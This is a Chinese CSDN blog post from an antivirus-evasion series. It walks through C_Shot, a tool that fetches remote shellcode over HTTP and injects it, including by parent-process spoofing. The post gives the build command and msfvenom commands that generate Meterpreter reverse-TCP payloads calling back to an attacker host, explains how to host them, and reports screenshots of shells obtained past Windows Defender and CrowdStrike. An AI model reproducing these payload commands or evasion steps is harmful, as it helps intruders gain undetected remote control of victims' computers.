WEB渗透免杀篇-cshot远程shellcode

已于 2024-08-21 14:02:40 修改
阅读量298 收藏 7
点赞数 5
分类专栏: 渗透测试 文章标签: WEB渗透 渗透测试 WEB安全 网络安全 免杀
于 2024-08-21 14:00:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59468567/article/details/141391868
版权

  往期文章

 WEB渗透免杀篇-免杀工具全集-CSDN博客 

  WEB渗透免杀篇-加载器免杀-CSDN博客

 WEB渗透免杀篇-分块免杀-CSDN博客

WEB渗透免杀篇-Powershell免杀-CSDN博客

WEB渗透免杀篇-Python源码免杀-CSDN博客

WEB渗透免杀篇-C#源码免杀-CSDN博客

WEB渗透免杀篇-MSF+shellcode免杀-CSDN博客

WEB渗透免杀篇-MSF免杀-CSDN博客

WEB渗透免杀篇-Bypass-AMSI-CSDN博客

WEB渗透免杀篇-Golang免杀-CSDN博客

WEB渗透免杀篇-Pezor免杀-CSDN博客

WEB渗透免杀篇-cshot远程shellcode-CSDN博客

 

From: GitHub - anthemtotheego/C_Shot
C_Shot是一种用C语言编写的攻击性安全工具,旨在通过HTTP / HTTPS下载远程shellcode二进制文件(.bin),注入并执行shellcode。 1.shellcode注入其自己的进程 2.使用父进程欺骗将shellcode注入子进程 使用C_Shot之类的工具的好处是,我们要执行的恶意代码没有存储在二进制文件中,而是从远程位置检索,读入内存然后执行。这有助于使诸如C_Shot之类的工具对AV / EDR显得相当友好,并且不会被发现。

image

cl / D _UNICODE / D UNICODE cshot.c

image

生成分阶段payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -a x64 --platform windows -b "\x00" -f raw -o /root/Desktop/DefaultStaged.bin

生成无阶段payload

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST= IP LPORT= PORT -a x64 --platform windows -b "\x00" -f raw -o /root/Desktop/DefaultStageless.bin

现在我们已经建立了二进制文件,现在需要一个Web服务。例如运行python -m SimpleHTTPServer 80,或者将它们托管在外部某个地方。对于本文中的所有示例,我将使用github托管shellcode。

image

确保windows defender打开。

image

注入到自己的进程中

image

测试分阶段的shellcode会被windows defender拦截

image

无阶段的shellcode不会被拦截

image

获得shell

image

测试分阶段shellcode欺骗父进程方法:

image

image

获得shell

image

现在测试下CrowdStrike 注入到自己的进程,两种shellcode都被拦截

image

image

欺骗父进程

image

获得shell

image

image

分阶段和无阶段的shellcode在使用欺骗父进程方法时都可以绕过av。 此工具在公共发行版中,没有进行任何形式的API隐藏,字符串混淆,内存保护技巧等工作。如果未进行任何修改,则对该工具的静态分析应该很容易发现。

Pluto-2003
关注
专栏目录
CShot_researchers_C#_cshot_lion4ts_区域截图_
09-29
CShot:C#实现的高效区域截图工具》 在IT行业中,屏幕截图是一个非常常见的需求,无论是为了记录问题、分享信息还是进行教学演示。CShot是一个由C#语言编写的高效工具,专用于实现对屏幕、窗口或指定区域的截图...
OPPO手机文件夹还能这样用,以前不知道,真的好浪费了
weixin_45637361的博客
10-29 1410
手机中所有的数据几乎全部在文件夹中,文件夹能够快速识别出文本、音乐、视频,想要将这些文件快速迁移的话,只需要拷贝文件夹即可。除了这些以为文件夹还有哪些用途是大家不知道的呢!今天小编就给大家分享一下。 查看文档 想要快速查找保存在手机中的文档,可以直接打开文件管理–文档,点击要查找的文档。无论是office还是保存的PPT文件都可以直接查看到。打开手机文件夹–找到文档–选择你要阅读的文档。 应用...
Shellcode详解
最新发布
N阶二进制的博客
06-18 2450
Shellcode是一种小巧、紧凑的机器代码,通常用于利用软件漏洞或注入攻击中。其名称来源于早期的黑客技术,其中的代码通常会启动一个命令行shell(如Bash或cmd),因此称为“shellcode”。不过,现在shellcode不仅仅用于启动shell,还可以执行各种恶意活动,如下载并执行恶意软件、修改系统设置等。
shellcode,缓冲区溢出漏洞及 远程调call
任鸟飞2217777779的博客
02-13 1368
这个函数分配了8个字节的缓冲区,然后通过 strcpy 函数将传进来的字符串复制到缓冲区中,最后输出,如果传入的字符串大于 8的话就会发生溢出,并向后覆盖堆栈中的信息,如果只是一些乱码的话那个最多造成程序崩溃,如果传入的是一段精心设计的代码,那么计算机可能回去执行这段攻击代码。我们的shellcode 不能有00,否则 strcpy 会提前结束,所以 上面的代码中有字符串00结尾,需要我们修改成其他的代码形式。我们只要把返回地址覆盖成我们要执行的代码地址,就可以让该函数返回的时候去顺利执行我们的代码了.
C/C++ 远程ShellCode执行工具
热门推荐
CSDN
07-21 1万+
通过开发一组远程代码执行盒,可以动态实现对ShellCode代码的动态载入,由于ShellCode不存放在本地客户端常量区,所以在一定程度上可以减少被杀概率,客户端只保留之基本的Socket通信功能,当需要时才会加载恶意代码运行。此工具分为服务端与客户端,客户端可以将其加入到开机自启动列表,并传入响应的参数即可,目前支持TCP/UDP/HTTP三种协议传输,后期可能会增加ICMP等来实现后门的传输工作。
Linux ShellCode远程攻击原理
For free
02-27 1965
这里就以exit 系统调用为例 首先编写C代码,在GDB中使用 disass _exit 反汇编exit 函数,之后迁移为汇编代码。 section .text global _start _start: xor eax, eax xor ebx, ebx mov al, 0x01 int 0x80 之后只用如下nasm 进行汇编, ld 进行连接,生成可执行文件nasm -f elf
颜色分类leetcode-point-cloud-donkey:基于霍夫空间的点云最近邻对象识别管道
07-06
颜色分类leetcode 点云驴 基于霍夫空间的点云最近邻对象识别管道 maneki-neko(幸运猫)网格模型是用户 bs3 的知识产权(取自并转换为点云)。 描述 Point-cloud-donkey ...CSHOT 的基本管道 班级/ 实例准
JAVA初学者的编程软件
04-12
**标题:“JAVA初学者的编程软件”** 在Java编程领域,选择一款合适的开发环境对于初学者至关重要。"JAVA初学者的编程软件"通常指的是提供友好界面、易学易用功能的集成开发环境(IDE),旨在帮助新手快速入门并...
android 手机可以设置的拍照参数
07-01
Cshot-Indicator-Supported(Cshot指示器支持) - **定义**:表明是否支持Cshot指示器功能。 - **作用**:通过Cshot指示器显示拍摄状态,便于用户了解拍摄进度。 #### 29. Preview-Frame-Rate(预览帧率) - **...
cwp su selfdocs
01-05
- **CSHOTPLOT**:将 CSHOT 数据转换为适合 CWP 图形化工具的文件格式。 - **DZDV**:计算深度相对于速度的导数。 - **FARITH**:对二进制文件进行简单的算术运算。 - **FTNSTRIP**:移除文件中的记录分隔符。 ...
通用型ShellCode,加载指定DLL模块
逐天实验室 ( SCLB )
11-03 4570
利用通用型ShellCode加载指定Dll模块,并提取ShellCode字节码,调用ShellCode
远程执行shellcode
aod83029的博客
06-13 485
#include "Windows.h" #include <WinSock2.h> #include <stdio.h> #pragma comment(lib,"WS2_32.lib") int shellcode_execute() { WSADATA wsData; if(WSAStartup...
ShellCode编写和远程代码注入
&Ψ的博客
09-15 1594
文章目录1.ShellCode是什么2.ShellCode的编写原则3.TEB与PEB1)TEB线程信息获取当前线程的TEB2)PEB进程环境块获取当前进程的TEBPEB_LDR_DATALDR_DATA_TABLE_ENTRY在任意进程中找到一个LDR_DATA_TABLE_ENTRY1.一些结构体的定义2.寻找方法4.ShellCode的实现思路5.远程注入代码6.关于我在vs2017编写时遇到的问题解决方法 1.ShellCode是什么 一段特殊的代码,不依赖与任何进程环境。简单来讲就是一段可以在Wi
ShellCode的另外一种玩法(远程线程注入ShellCode)[by Anskya]
04-06 2233
 [原创]ShellCode的另外一种玩法(远程线程注入ShellCode)介于小弟技术菜,请各位大哥不要"奸笑"希望可以指点一二转载请保留版权:by Anskya这里是说将ShellCode代码直接注射到远程进程内部使她运行!以下代码全部使用TASM为原型编写(MASM不太适合,不能自定义PE结构,为了某某人说我抄袭和盗版pkXX大哥的FASM大作,我这里就使用国内很少用的TASM为原型
【四圣龙神录的编程教室】第1章、准备项目的素材
Tidus5的专栏
11-14 3878
原文地址: http://dixq.net/rp/1.html 龙神录的编程教室,是使用VisualStudio 2005 或者 2008 作为工具来讲解的。 下面的项目,是带上了素材一起打包进去了的。 整个项目一起打包下载 文件夹的组成,大概是长这个样子 上面图片里虽然写着第一章,但这里会加很多东西进去的。 以后的章节
如何编写绑定端口shellcode
海枫的专栏
02-16 4864
本文介绍绑定端口的shellcode。攻击通过网络利用缓冲区溢出漏洞,注入该shellcode,那就可以能过shellcode打开的端口进行利用。
远程线程shellcode注入
ndl1302732的专栏
10-11 2318
高手请飘过~~~~~~~~~~~~~~~~~~~~~~~~~~~          前一文章,写到了利用远程线程注入DLL,其原理是利用LoadLibaray把DLL加载进去,这种方式注入简单,但是会在对方进程加载一个模块。人家用工具一看,多了个模块,就知道被搞了。。。           今天写下用远程线程注入shellcode, 注入shellcode的难点是,注入的代码不能访问绝对地址...
MXNet如何生成.lst文件和.rec文件
AI之路
10-19 1万+
MXNet框架用于做图像相关的项目时,读取图像主要有两种方式:第一种是读.rec格式的文件,类似Caffe框架中LMDB,优点是.rec文件比较稳定,移植到别的电脑上也能复现,缺点是占空间(.rec文件的大小基本上和图像的存储大小差不多),而且增删数据不大灵活。第二种是.lst和图像结合的方式,首先在前面生成.rec文件的过程中也会生成.lst文件,这个.lst文件就是图像路径和标签的对应列表,也
CWP地震资料处理开源软件手册:Seismic Unix命令详解
13. **CSHOTPLOT** - 转换CSHOT数据以供CWP图形程序使用,用于数据可视化。 14. **DGWAVEFORM** - 创建高斯导数波形,可能用于模拟地震波形或滤波器设计。 15. **DZDV** - 计算深度导数,这对于理解地震波在地下传播...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pluto-2003

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值